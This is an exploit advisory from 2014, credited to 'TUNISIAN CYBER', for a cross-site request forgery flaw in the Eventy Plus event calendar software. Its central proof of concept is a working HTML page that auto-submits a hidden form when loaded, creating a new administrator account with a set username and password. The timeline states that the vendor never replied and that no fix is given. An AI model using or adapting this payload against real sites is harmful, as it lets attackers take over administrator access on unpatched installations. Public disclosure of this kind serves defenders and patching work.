[+] Author: TUNISIAN CYBER [+] Exploit Title: Eventy Plus Cross-Site Request Forgery (Add Admin) Vulnerability [+] Date: 03-03-2014 [+] Category: WebApp [+] Tested on: KaliLinux/Windows 7 Pro [+] CWE: CWE-352 [+] Vendor: http://calendarscripts.info/ [+] Friendly Sites: na3il.com,th3-creative.com [+] Twitter: @TCYB3R 1.OVERVIEW: Eventy Plus suffers from a Cross-Site Request Forgery (Add Admin) Vulnerability. 2.Version: All 3.Background: Eventy Is Beautiful And Easy To Use Web Based Event Calendar Software Publish events like parties, courses, meetings, conferences, workshops, and more in easy and user-friendly way. http://calendarscripts.info/event-calendar-software.html 4.Proof Of Concept: <html> Eventy Plus CSRF Add admin Vulnerability <body onload="document.form0.submit();"> <form method="POST" name="form0" action="http://demo.pimteam.net/eventy-plus/a_admins.php"> <input type="hidden" name="username " value="TCYB3R"/> <input type="hidden" name="pass" value="mootez2"/> <input type="hidden" name="add" value="1"/> </form> </html> 5.Solution(s): no contact from endor 6.TIME-LINE: 2014-03-01: Vulnerability was discovered. 2014-03-02: No Reply 2014-03-03: No Reply 2014-03-03: Vulnerability Published 7.Greetings: Xmax-tn Xtech-set N43il Sec4ver,E4A Members